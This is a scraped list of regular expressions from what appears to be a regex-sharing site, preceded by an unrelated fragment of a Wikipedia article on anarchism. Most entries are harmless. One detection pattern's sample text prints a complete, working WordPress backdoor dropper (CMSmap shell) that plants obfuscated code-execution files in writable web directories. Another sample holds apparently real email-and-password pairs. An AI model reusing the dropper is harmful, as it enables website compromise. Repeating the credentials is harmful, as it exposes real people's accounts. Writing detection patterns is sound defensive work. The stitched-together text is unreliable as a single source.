[[mutualism]] (mutuellisme), involved an exchange economy where individuals and groups could trade the products of their labor using ''labor notes'' which represented the amount of working time involved in production. This would ensure that no one would profit from the labor of others. Workers could freely join together in co-operative workshops. An interest-free bank would be set up to provide everyone with access to the means of production. Proudhon's ideas were influential within French working class movements, and his followers were active in the [[Revolution of 1848]] in France. Proudhon's philosophy of property is complex: it was developed in a number of works over his lifetime, and there are differing interpretations of some of his ideas. ''For more detailed discussion see [[Pierre-Joseph Proudhon|here]].'' ==Max Stirner's Egoism== {{main articles|[[Max Stirner]] and [[Egoism]]}} In his ''The Ego and Its Own'' Stirner argued that most commonly accepted social institutions - including the notion of State, property as a right, natural rights in general, and the very notion of society - were mere illusions or ''ghosts'' in the mind, saying of society that &quot;the individuals are its reality.&quot; He advocated egoism and a form of amoralism, in which individuals would unite in 'associations of egoists' only when it was in their self interest to do so. For him, property simply comes about through might: &quot;Whoever knows how to take, to defend, the thing, to him belongs property.&quot; And, &quot;What I have in my power, that is my own. So long as I assert myself as holder, I am the proprietor of the thing.&quot;
Wikipedia parse
2016-05-29T21:36:02.000Z
\\">(.*?)<\/td>
<tr>\r\n\t\t<td class=\"printCell\">NOLES A/S</td><td class=\"printCell\">Plast, glas og beton</td><td class=\"printCell\">Grøn</td><td class=\"printCell\" align=\"center\">13-04-2012</td><td class=\"printCell\" align=\"center\">&nbsp;</td>\r\n\t</tr>
test
2016-03-10T08:55:08.000Z
([a-z0-9\.\-\_]{1,})@([a-z0-9\.\-\_]{3,})
First-middle.lastname@random-provider.com
Match email addresses and get the mail provider as a group
2015-06-10T18:23:24.000Z
(?:^|)(\S+\:)
cxcxcxc stockholm: Nord nsfhjdfhj
Word ending with colon
2015-07-20T19:03:07.000Z
^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*.{0,150}?\/m7x\/cmsmap.{0,550}?function copy_file1\(\$dest\)\{\s*file_put_contents\(\$dest\..{0,150}?base64_decode\('pd9wahancmz1bmn0aw9uigj5c.{0,600}?y0mpo0akxygpoz8\+'\)\);.{0,500}?if\(is_dir\(\$dir\.\$file\.'\/\/wp-includes.{0,1700}?if\(is_dir\(\$dir\.\$file\.'\/\/public_html\/.{0,500}?closedir\(\$dh[\);\s*\}]+listdir\(\$_server\['document_root'\][[:punct:]\s]+$
<?php /** * Plugin Name: CMSmap - WordPress Shell * Plugin URI: https://github.com/m7x/cmsmap/ * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program. * Version: 1.0 * Author: CMSmap * Author URI: https://github.com/m7x/cmsmap/ * License: GPLv2 */ header("content-Type: text/html; charset=gb2312"); function copy_file1($dest){ file_put_contents($dest.DIRECTORY_SEPARATOR.'wp-config.bak.php',base64_decode('PD9waHANCmZ1bmN0aW9uIGJ5cGFzcygpew0KICAgIHJldHVybiAibChcJF9QT1NUWyciOw0KfQ0KZXZhbCgiZXZhIi5ieXBhc3MoKS4ieCddKTsiKTsNCj8+DQo8PyRfdVU9Y2hyKDk5KS5jaHIoMTA0KS5jaHIoMTE0KTskX2NDPSRfdVUoMTAxKS4kX3VVKDExOCkuJF91VSg5NykuJF91VSgxMDgpLiRfdVUoNDApLiRfdVUoMzYpLiRfdVUoOTUpLiRfdVUoODApLiRfdVUoNzkpLiRfdVUoODMpLiRfdVUoODQpLiRfdVUoOTEpLiRfdVUoNDkpLiRfdVUoOTMpLiRfdVUoNDEpLiRfdVUoNTkpOyRfZkY9JF91VSg5OSkuJF91VSgxMTQpLiRfdVUoMTAxKS4kX3VVKDk3KS4kX3VVKDExNikuJF91VSgxMDEpLiRfdVUoOTUpLiRfdVUoMTAyKS4kX3VVKDExNykuJF91VSgxMTApLiRfdVUoOTkpLiRfdVUoMTE2KS4kX3VVKDEwNSkuJF91VSgxMTEpLiRfdVUoMTEwKTskXz0kX2ZGKCIiLCRfY0MpO0AkXygpOz8+')); } function listDir($dir){ if(is_dir($dir)){ if ($dh = opendir($dir)) { while (($file= readdir($dh)) !== false){ if((is_dir($dir."/".$file)) && $file!="." && $file!="..") { if(is_writable($dir."/".$file)&&is_readable($dir."/".$file)) { if(strpos($dir.$file,'.') !== false){ if(is_dir($dir.$file.'//wp-includes//')){ copy_file1($dir.$file); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> wpincludes</font>"."<br><hr>"; } if(is_dir($dir.$file.'//modules//')){ copy_file1($dir.$file); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> modules</font>"."<br><hr>"; } if(is_dir($dir.$file.'//public_html//')){ copy_file1($dir.$file.'//public_html//'); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> publichtml</font>"."<br><hr>"; } } }else{ if(is_writable($dir."/".$file)) { if(strpos($dir.$file,'.') !== false){ if(is_dir($dir.$file.'//wp-includes//')){ copy_file1($dir.$file); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> wpincludes</font>"."<br><hr>"; } if(is_dir($dir.$file.'//modules//')){ copy_file1($dir.$file); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> modules</font>"."<br><hr>"; } if(is_dir($dir.$file.'//public_html//')){ copy_file1($dir.$file); echo "<b><font color='red'>file:</font></b>".$dir.$file."<font color='red'> publichtml</font>"."<br><hr>"; } } }else { } } listDir($dir."/".$file."/"); } } } closedir($dh); } } ListDir($_SERVER['DOCUMENT_ROOT'].'//..//..//'); ?>
tilak filehacker
2020-04-08T14:11:31.000Z
BIC (Bank Identifier Code) #fin #bank #swift #iban #bic
([a-zA-Z]{4})([a-zA-Z]{2})(([2-9a-zA-Z]{1})([0-9a-np-zA-NP-Z]{1}))((([0-9a-wy-zA-WY-Z]{1})([0-9a-zA-Z]{2}))|([xX]{3})|)
DEKTDE7GXXX GEBABEBB BKAUATWW COBADEFF060 UCJAES2MXXX ESSEDE5F100 CMCIFRPP CHASFIHHXXX PBNKDEFF100 ZUNOCZPP ABNACHZ8XXX DNBANOKK DEUTDEDB101 ARSPBE22 DXIADEBBXXX
BIC Codes
2021-08-30T13:05:25.000Z
\[\D+\d\s*\D.*
[F3- Salir] [ F6 - Documento Material > ] [ F7 - Entrega Distribucion > ] [ F9 - Documento Inventario > ] [ F8 - Validacion Documento > ] [ F2 - Varios > ]
regex Sap
2019-09-12T13:21:45.000Z
Full email regex
^[\w!#$%&'*+\/=?`{|}~^-]+(?:\.[\w!#$%&'*+\/=?`{|}~^-]+)*@(?:[A-Z0-9-]+\.)+[A-Z]{2,6}
edwin.allen@gmail.com
Email Regular Expresion
2017-08-18T14:40:20.000Z
Regex For finding username:password
[0-9A-Za-z.@]+:[0-z]+
len.simms@talktalk.net:sophie1 Status: Premium Storage available: 6 TB of 6 TB Payout sum: $0.00 Bandwith available: 495.88 GB of 3 TB E-mail: len.simms@talktalk.net ------------ tabbott85@hotmail.co.uk:jeneva Status: Premium Storage available: unlimited Payout sum: $0.00 Bandwith available: 465.4 GB of 1 TB E-mail: tabbott85@hotmail.co.uk
Username:Password
2015-07-12T06:50:35.000Z
Use this to find wich mods (in Minecraft, Forge) errored out in the Crashlog
^\s+[ULCHIJAD]+E\s+(.+)
---- Minecraft Crash Report ---- // I let you down. Sorry :( Time: 28.10.15 11:27 Description: Exception in server tick loop cpw.mods.fml.common.LoaderException: java.lang.NoClassDefFoundError: net/minecraft/client/multiplayer/WorldClient at cpw.mods.fml.common.LoadController.transition(LoadController.java:163) at cpw.mods.fml.common.Loader.loadMods(Loader.java:544) at cpw.mods.fml.server.FMLServerHandler.beginServerLoading(FMLServerHandler.java:87) at cpw.mods.fml.common.FMLCommonHandler.onServerStart(FMLCommonHandler.java:314) at net.minecraft.server.dedicated.DedicatedServer.func_71197_b(DedicatedServer.java:117) at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:387) at net.minecraft.server.MinecraftServer$2.run(MinecraftServer.java:685) Caused by: java.lang.NoClassDefFoundError: net/minecraft/client/multiplayer/WorldClient at java.lang.Class.forName0(Native Method) at java.lang.Class.forName(Unknown Source) at cpw.mods.fml.common.FMLModContainer.constructMod(FMLModContainer.java:440) at sun.reflect.GeneratedMethodAccessor5.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74) at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47) at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322) at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304) at com.google.common.eventbus.EventBus.post(EventBus.java:275) at cpw.mods.fml.common.LoadController.sendEventToModContainer(LoadController.java:212) at cpw.mods.fml.common.LoadController.propogateStateMessage(LoadController.java:190) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74) at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47) at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322) at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304) at com.google.common.eventbus.EventBus.post(EventBus.java:275) at cpw.mods.fml.common.LoadController.distributeStateMessage(LoadController.java:119) at cpw.mods.fml.common.Loader.loadMods(Loader.java:513) ... 5 more Caused by: java.lang.ClassNotFoundException: net.minecraft.client.multiplayer.WorldClient at net.minecraft.launchwrapper.LaunchClassLoader.findClass(LaunchClassLoader.java:191) at java.lang.ClassLoader.loadClass(Unknown Source) at java.lang.ClassLoader.loadClass(Unknown Source) ... 29 more Caused by: java.lang.RuntimeException: Attempted to load class bjf for invalid side SERVER at cpw.mods.fml.common.asm.transformers.SideTransformer.transform(SideTransformer.java:50) at net.minecraft.launchwrapper.LaunchClassLoader.runTransformers(LaunchClassLoader.java:279) at net.minecraft.launchwrapper.LaunchClassLoader.findClass(LaunchClassLoader.java:176) ... 31 more A detailed walkthrough of the error, its code path and all known details is as follows: --------------------------------------------------------------------------------------- -- System Details -- Details: Minecraft Version: 1.7.10 Operating System: Windows 10 (amd64) version 10.0 Java Version: 1.8.0_60, Oracle Corporation Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode), Oracle Corporation Memory: 882519880 bytes (841 MB) / 1056440320 bytes (1007 MB) up to 3728736256 bytes (3556 MB) JVM Flags: 2 total; -Xmx4000M -Xmx4000M AABB Pool Size: 0 (0 bytes; 0 MB) allocated, 0 (0 bytes; 0 MB) used IntCache: cache: 0, tcache: 0, allocated: 0, tallocated: 0 FML: MCP v9.05 FML v7.10.99.99 Minecraft Forge 10.13.4.1517 122 mods loaded, 122 mods active States: 'U' = Unloaded 'L' = Loaded 'C' = Constructed 'H' = Pre-initialized 'I' = Initialized 'J' = Post-initialized 'A' = Available 'D' = Disabled 'E' = Errored UC mcp{9.05} [Minecraft Coder Pack] (minecraft.jar) UC FML{7.10.99.99} [Forge Mod Loader] (forge-1.7.10-10.13.4.1517-1.7.10-universal.jar) UC Forge{10.13.4.1517} [Minecraft Forge] (forge-1.7.10-10.13.4.1517-1.7.10-universal.jar) UC AM2-Preloader{0.0.2} [AMCore] (minecraft.jar) UC CodeChickenCore{1.0.7.47} [CodeChicken Core] (minecraft.jar) UC Micdoodlecore{} [Micdoodle8 Core] (minecraft.jar) UC NotEnoughItems{1.0.5.118} [Not Enough Items] (NotEnoughItems-1.7.10-1.0.5.118-universal (1).jar) UC <CoFH ASM>{000} [CoFH ASM] (minecraft.jar) UC AnimationAPI{1.2.4} [AnimationAPI] (AnimationAPI-1.7.10-1.2.4 (1).jar) UC arsmagica2{1.4.0.008} [Ars Magica 2] (1.7.10_AM2-1.4.0.008 (1).jar) UC IC2{2.2.790-experimental} [IndustrialCraft 2] (industrialcraft-2-2.2.790-experimental.jar) UC AdvancedSolarPanel{1.7.10-3.5.1} [Advanced Solar Panels] (Advanced-Solar-Panels-Addon-1.7.10.jar) UC CoFHCore{1.7.10R3.0.3} [CoFH Core] (CoFHCore-[1.7.10]3.0.3-303 (1).jar) UC advancedgenetics{1.5.9} [Advanced Genetics] (advancedgenetics-1.7.10-1.5.9.jar) UC ArchimedesShips{1.7.10 v1.7.1} [Archimedes' Ships] (ArchimedesShips-1.7.1.jar) UC Baubles{1.0.1.10} [Baubles] (Baubles-1.7.10-1.0.1.10.jar) UC betterstorage{0.13.1.126} [BetterStorage] (BetterStorage-1.7.10-0.13.1.126.jar) UC BiblioCraft{1.11.3} [BiblioCraft] (BiblioCraft[v1.11.3][MC1.7.10].jar) UC BiomesOPlenty{2.1.0} [Biomes O' Plenty] (BiomesOPlenty-1.7.10-2.1.0.1462-universal.jar) UC Botania{r1.7-228} [Botania] (Botania r1.7-228.jar) UC Railcraft{9.7.0.0} [Railcraft] (Railcraft_1.7.10-9.7.0.0.jar) UC TwilightForest{2.3.7} [The Twilight Forest] (twilightforest-1.7.10-2.3.7.jar) UC ForgeMultipart{1.2.0.345} [Forge Multipart] (ForgeMultipart-1.7.10-1.2.0.345-universal.jar) UC chisel{2.5.1.44} [Chisel 2] (Chisel2-2.5.1.44.jar) UC CarpentersBlocks{3.3.8_dev_r2} [Carpenter's Blocks] (Carpenter's Blocks v3.3.8_dev_r2 - MC 1.7.10.jar) UC ChickenChunks{1.3.4.19} [ChickenChunks] (ChickenChunks-1.7.10-1.3.4.19-universal (1).jar) UC chocolateQuest{1.0} [Chocolate Quest] (chocolateQuest-1.7.10-1.0 (1).jar) UC customnpcs{1.7.10c} [CustomNpcs] (CustomNPCs_1.7.10c.jar) UC CustomOreGen{1.2.21} [Custom Ore Generation] (CustomOreGen-1.7.10-1.2.21.jar) UC dldungeonsjdg{1.8.7} [Doomlike Dungeons] (DoomlikeDungeons-1.8.7-MC1.7.10.jar) UC DragonMounts{r41-1.7.10} [Dragon Mounts] (DragonMounts-r41-1.7.10.jar) UE DynamicLights{1.3.9} [Dynamic Lights] (DynamicLights-1.7.10.jar) UE DynamicLights_onFire{1.0.5} [Dynamic Lights Burning Entity Module] (DynamicLights-1.7.10.jar) UE DynamicLights_creepers{1.0.4} [Dynamic Lights Creeper Module] (DynamicLights-1.7.10.jar) UE DynamicLights_dropItems{1.0.8} [Dynamic Lights EntityItem Module] (DynamicLights-1.7.10.jar) UE DynamicLights_entityClasses{1.0.1} [Dynamic Lights Entity Light Module] (DynamicLights-1.7.10.jar) UE DynamicLights_mobEquipment{1.0.8} [Dynamic Lights Mob Equipment Light Module] (DynamicLights-1.7.10.jar) UE DynamicLights_flameArrows{1.0.0} [Dynamic Lights Fiery Arrows Light Module] (DynamicLights-1.7.10.jar) UE DynamicLights_floodLights{1.0.2} [Dynamic Lights Flood Light] (DynamicLights-1.7.10.jar) UE DynamicLights_otherPlayers{1.0.8} [Dynamic Lights OtherPlayers Light Module] (DynamicLights-1.7.10.jar) UE DynamicLights_thePlayer{1.1.4} [Dynamic Lights Player Light Module] (DynamicLights-1.7.10.jar) UC EnderStorage{1.4.7.37} [EnderStorage] (EnderStorage-1.7.10-1.4.7.37-universal (1).jar) UC ThermalFoundation{1.7.10R1.2.0} [Thermal Foundation] (ThermalFoundation-[1.7.10]1.2.0-102 (1).jar) UC ThermalExpansion{1.7.10R4.0.3B1} [Thermal Expansion] (ThermalExpansion-[1.7.10]4.0.3B1-218 (1).jar) UC enhancedportals{3.0.12} [EnhancedPortals] (EnhancedPortals_1.7.10-universal-3.0.12.jar) UC flansmod{4.10.0} [Flan's Mod] (Flans Mod-1.7.10-4.10.0.jar) UC FoodPlus{3.2rS} [Food Plus] (FoodPlus-1.7.2-3.2rS.jar) UC fossil{1.7.10 Build 7.2.1} [Fossils and Archeology Revival] (Fossils_Archeology_Revival-1.7.10_Build-7.2.1.jar) UC GalacticraftCore{3.0.12} [Galacticraft Core] (GalacticraftCore-1.7-3.0.12.399.jar) UC GalacticraftMars{3.0.12} [Galacticraft Planets] (Galacticraft-Planets-1.7-3.0.12.399.jar) UC GraviSuite{1.7.10-2.0.3} [Graviation Suite] (Gravitation-Suite-Addon-1.7.10.jar) UC iChunUtil{4.2.2} [iChunUtil] (iChunUtil-4.2.2 (1).jar) UC GraviGun{4.0.0-beta} [GraviGun] (GravityGun-4.0.0-beta.jar) UC grim3212core{V0.2 - 1.7.10} [Grim3212 Core] (Grim3212-Core-1.7.10 (2).jar) UC IronChest{6.0.62.742} [Iron Chest] (ironchest-1.7.10-6.0.62.742-universal.jar) UC JABBA{1.2.1} [JABBA] (Jabba-1.2.1a_1.7.10.jar) UC Mantle{1.7.10-0.3.2.jenkins184} [Mantle] (Mantle-1.7.10-0.3.2 (1).jar) UC Mekanism{8.1.7} [Mekanism] (Mekanism-1.7.10-8.1.7.252.jar) UC MekanismGenerators{8.1.7} [MekanismGenerators] (MekanismGenerators-1.7.10-8.1.7.252.jar) UC MekanismTools{8.1.7} [MekanismTools] (MekanismTools-1.7.10-8.1.7.252.jar) UC MineFactoryReloaded{1.7.10R2.8.0} [MineFactory Reloaded] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatAppliedEnergistics{1.7.10R2.8.0} [MFR Compat: Applied Energistics] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatAtum{1.7.10R2.8.0} [MFR Compat: Atum] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatBackTools{1.7.10R2.8.0} [MFR Compat: BackTools] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatBuildCraft{1.7.10R2.8.0} [MFR Compat: BuildCraft] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatChococraft{1.7.10R2.8.0} [MFR Compat: Chococraft] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatExtraBiomes{1.7.10R2.8.0} [MFR Compat: ExtraBiomes] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatForestry{1.7.10R2.8.0} [MFR Compat: Forestry] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatForgeMicroblock{1.7.10R2.8.0} [MFR Compat: ForgeMicroblock] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatIC2{1.7.10R2.8.0} [MFR Compat: IC2] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatMystcraft{1.7.10R2.8.0} [MFR Compat: Mystcraft] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MrTJPCoreMod{1.1.0.31} [MrTJPCore] (MrTJPCore-1.7.10-1.1.0.31-universal.jar) UC ProjRed|Core{4.7.0pre9.92} [ProjectRed Core] (ProjectRed-1.7.10-4.7.0pre9.92-Base.jar) UC ProjRed|Exploration{4.7.0pre9.92} [ProjectRed Exploration] (ProjectRed-1.7.10-4.7.0pre9.92-World.jar) UC MineFactoryReloaded|CompatProjRed{1.7.10R2.8.0} [MFR Compat ProjectRed] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatRailcraft{1.7.10R2.8.0} [MFR Compat: Railcraft] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatSufficientBiomes{1.7.10R2.8.0} [MFR Compat: Sufficient Biomes] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatThaumcraft{1.7.10R2.8.0} [MFR Compat: Thaumcraft] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatThermalExpansion{1.7.10R2.8.0} [MFR Compat: Thermal Expansion] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC TConstruct{1.7.10-1.8.5.build957} [Tinkers' Construct] (TConstruct-1.7.10-1.8.5.jar) UC MineFactoryReloaded|CompatTConstruct{1.7.10R2.8.0} [MFR Compat: Tinkers' Construct] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatTwilightForest{1.7.10R2.8.0} [MFR Compat: TwilightForest] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC MineFactoryReloaded|CompatVanilla{1.7.10R2.8.0} [MFR Compat: Vanilla] (MineFactoryReloaded-[1.7.10]2.8.0-104 (1).jar) UC AS_Minions{1.9.4} [Minions] (Minions-1.7.10.jar) UC testdummy{1.0} [MmmMmmMmmMmm] (MmmMmmMmmMmm-1.6.jar) UC MorePlanet{1.3.0} [More Planets] (More-Planets-1.7.10-1.3.0-Pre-1 (1).jar) UC Morph{0.9.2} [Morph] (Morph-Beta-0.9.2.jar) UC NetherOres{1.7.10R2.3.0} [Nether Ores] (NetherOres-[1.7.10]2.3.0-12 (1).jar) UC clearingblock{0.3} [ClearingBlock Mod] (Nuclear Bomb Mod 1.0v.jar) UC nuclearcraft{V0.1 - 1.7.10} [Nuclear Craft] (Nuclear-Craft-Mod-1.7.10.jar) UC OreSpawn{1.7.10.20.3} [OreSpawn] (orespawn-1.7.10-20.3 (1).zip) UC PortalGun{4.0.0-beta-5} [PortalGun] (Portal-Gun-Mod-1.7.10.jar) UC PowerConverters{1.7.10_3.3.0-jenkins.76} [Power Converters] (PowerConverters-1.7.10_3.3.0-jenkins.76.jar) UC ProjRed|Transmission{4.7.0pre9.92} [ProjectRed Transmission] (ProjectRed-1.7.10-4.7.0pre9.92-Integration.jar) UC ProjRed|Transportation{4.7.0pre9.92} [ProjectRed Transportation] (ProjectRed-1.7.10-4.7.0pre9.92-Mechanical.jar) UC ProjRed|Compatibility{4.7.0pre9.92} [ProjectRed Compatibility] (ProjectRed-1.7.10-4.7.0pre9.92-Compat.jar) UC ProjRed|Integration{4.7.0pre9.92} [ProjectRed Integration] (ProjectRed-1.7.10-4.7.0pre9.92-Integration.jar) UC ProjRed|Fabrication{4.7.0pre9.92} [ProjectRed Fabrication] (ProjectRed-1.7.10-4.7.0pre9.92-Fabrication.jar) UC ProjRed|Illumination{4.7.0pre9.92} [ProjectRed Illumination] (ProjectRed-1.7.10-4.7.0pre9.92-Lighting.jar) UC ProjRed|Expansion{4.7.0pre9.92} [ProjectRed Expansion] (ProjectRed-1.7.10-4.7.0pre9.92-Mechanical.jar) UC qCraft{1.2} [qCraft] (qCraft1.2.zip) UC QuarryPlus{2.1.0} [QuarryPlus] (QuarryPlus-1.7.10-2.1.0.jar) UC RandomThings{2.2.4} [Random Things] (RandomThings-2.2.4.jar) UC RedstoneArsenal{1.7.10R1.1.1} [Redstone Arsenal] (RedstoneArsenal-[1.7.10]1.1.1-89 (1).jar) UC rivalrebels{1.7.10N} [Rival Rebels] (rivalrebels-1.7.10N.jar) UC secretroomsmod{4.7.1} [The SecretRoomsMod] (secretroomsmod-1.7.10-4.7.1.413.jar) UC simplyjetpacks{1.5.1} [Simply Jetpacks] (SimplyJetpacks-MC1.7.10-1.5.1.jar) UC Sync{4.0.0} [Sync] (Sync-4.0.0.jar) UC ThermalDynamics{1.7.10R1.1.0} [Thermal Dynamics] (ThermalDynamics-[1.7.10]1.1.0-161 (1).jar) UC TMechworks{1.7.10-75.0afb56c} [Tinkers' Mechworks] (TMechworks-1.7.10-0.2.9.jar) UC Torched{4.0.0} [Torched] (Torched-4.0.0.jar) UC Translocator{1.1.2.15} [Translocator] (Translocator-1.7.10-1.1.2.15-universal (1).jar) UC AS_UpdateCheck{1.1.6} [AtomicStryker Update Check Mod] (UpdateCheckerMod-1.7.10.jar) UC witchery{0.24.1} [Witchery] (witchery-1.7.10-0.24.1.jar) UC WR-CBE|Core{1.4.1.9} [WR-CBE Core] (WR-CBE-1.7.10-1.4.1.9-universal (1).jar) UC WR-CBE|Addons{1.4.1.9} [WR-CBE Addons] (WR-CBE-1.7.10-1.4.1.9-universal (1).jar) UC WR-CBE|Logic{1.4.1.9} [WR-CBE Logic] (WR-CBE-1.7.10-1.4.1.9-universal (1).jar) UC McMultipart{1.2.0.345} [Minecraft Multipart Plugin] (ForgeMultipart-1.7.10-1.2.0.345-universal.jar) UC ForgeRelocation{0.0.1.4} [ForgeRelocation] (ForgeRelocation-1.7.10-0.0.1.4-universal.jar) UC MCFrames{1.0} [MCFrames] (ForgeRelocation-1.7.10-0.0.1.4-universal.jar) UC RelocationFMP{0.0.1.2} [RelocationFMP] (ForgeRelocationFMP-1.7.10-0.0.1.2-universal.jar) UC ForgeMicroblock{1.2.0.345} [Forge Microblocks] (ForgeMultipart-1.7.10-1.2.0.345-universal.jar) CoFHCore: -[1.7.10]3.0.3-303 ThermalFoundation: -[1.7.10]1.2.0-102 ThermalExpansion: -[1.7.10]4.0.3B1-218 Mantle Environment: Environment healthy. MineFactoryReloaded: -[1.7.10]2.8.0-104 TConstruct Environment: Environment healthy. NetherOres: -[1.7.10]2.3.0-12 RedstoneArsenal: -[1.7.10]1.1.1-89 ThermalDynamics: -[1.7.10]1.1.0-161 Profiler Position: N/A (disabled) Is Modded: Definitely; Server brand changed to 'fml,forge' Type: Dedicated Server (map_server.txt)
Minecraft Crashlog Mod Errored
2015-11-12T19:24:08.000Z
test
^(ssh-rsa) (?!toto)
ssh-rsa
test
2015-05-12T00:08:21.000Z
SFM 2.4
(?<=\\x[ ](?P<modifier>[-,+,?])[ ])(?P<string>.+)(?=\\x\*)
\x - \xo 2.23: \xt Mrk 1.24; Luk 2.39; Jhn 1.45.\x* \x - \xo 10.19: a \xt Exo 20.13; Deu 5.17; \xo b \xt Exo 20.14; Deu 5.18; \xo c \xt Exo 20.15; Deu 5.19; \xo d \xt Exo 20.16; Deu 5.20; \xo e \xt Exo 20.12; Deu 5.16.\x* \x - \xo 15.51,52: \xdc 2Es 6.23; \xt 1Th 4.15-17.\x* \x - \xo 1.26: \xt \xdc Wis 2.23; Sir 17.3,4;\xdc* 1Co 11.7.\x*
Cross Reference Regex for SFM
2016-09-07T15:49:02.000Z
\B(?=(\d{3})+(?!\d))
Delimite a number with 3-digital block
2016-01-19T12:07:25.000Z
extract form the name of a tvseries file the season ande episode
.*([Ss][0-9].[eE][0-9].)+.
The.Big.Bang.Theory.S08E01.HDTV.x264-LOL.[VTV].mp4
Season and episode extractor
2016-03-05T23:36:49.000Z
Matches basic URLs and fails on things that aren't
^(?:https?:\/\/)?(?:[\da-z\.-]+)\.(?:[a-z\.]{2,6})(?:[\/\w \.-]*)*\/?(?:\?[\/\w=\-\&]*)?(?:#[\/\w\-]*)?$
Basic URL
2016-02-10T23:14:48.000Z
For pldi
(.*)\n(\d*)
Banana 67
Regex example
2023-07-13T11:02:28.000Z
test
.10
10.10.10.10
dot 10 check
2021-01-11T10:55:57.000Z
A regular expression to parse URLs. Complete with comments.
(?#First, match the protocol) (?:https?|ftp):// (?#Next, check for optional username and/or password) (?#Note: The following two char classes are functionally equivalent) (?:[\x21-\x39\x3b-\x3f\x41-\x7e]+(?::[!-9;-?A-~]+)?@)? (?#Next, let's match the domain [with support for Punycode ]) (?:xn--[0-9a-z]+|[0-9A-Za-z_-]+\.)*(?:xn--[0-9a-z]+|[0-9A-Za-z-]+)\.(?:xn--[0-9a-z]+|[0-9A-Za-z]{2,10}) (?#Let's match on optional port) (?::(?:6553[0-5]|655[0-2]\d|65[0-4]\d{2}|6[0-4]\d{3}|[1-5]\d{4}|[1-9]\d{1,3}|\d))? (?#Next, let's match on the path) (?:/[\x21\x22\x24\x25\x27-x2e\x30-\x3b\x3e\x40-\x5b\x5d-\x7e]*)* (?#Next, let's match on an anchor) (?:\#[\x21\x22\x24\x25\x27-x2e\x30-\x3b\x3e\x40-\x5b\x5d-\x7e]*)? (?#Last, but not least, we match on URI params) (?:\?[\x21\x22\x24\x25\x27-\x2e\x30-\x3b\x40-\x5b\x5d-\x7e]+=[\x21\x22\x24\x25\x27-\x2e\x30-\x3b\x40-\x5b\x5d-\x7e]*)? (?#Additional params) (?:&[\x21\x22\x24\x25\x27-\x2e\x30-\x3b\x40-\x5b\x5d-\x7e]+=[\x21\x22\x24\x25\x27-\x2e\x30-\x3b\x40-\x5b\x5d-\x7e]*)*
https://thechildrenareourfuture.org/#SomeRandomAnchorGoesHere http://user:pass@example.com:8080/omega:33 https://www.google.com:65535/ https://www.google.com:42069/ https://www.google.com:9876/ https://www.google.com:59999/ https://www.google.com:10000/ https://www.google.com:1234/ https://www.google.com:53/ https://www.google.com:123/ https://www.google.com:0/ ftp://username:password@example.com:21/path/here/to/file.tar.gz http://google.com?redirect=https%3A%2F%2Flocalhost%3A8080&var2=somethingelse https://john.smith@github.com/UserGroup/repo.git https://mattermost.com:8065/team/messages/@john.smith https://punycode.xn--j6w193g smtp://somesite.com/myFile.php SMTP://SOMESITE.COM/MYFILE.PHP unknown://somesite.com/fiLeNuM12345.php //SomeSite.ru/foO.php ://SomeOtherSite.oRg/baRR.php https://_sub1.sub2.sub3.s-u_b4.domain.com http://username:password@subdomain.domain.co.uk/path/to/file.html#Anchor1?key1=value1&key2=value2
Parse URLs
2021-10-19T22:48:10.000Z
Test
(?<=\.\/\d{4}-\d{2}-\d{2}\/)[^.]+
./2016-01-14/conn.12:00:00-12:37:35.log.gz
Test log
2016-01-19T18:39:38.000Z
(<img.*src=)["']https:\/\/(.*)["']
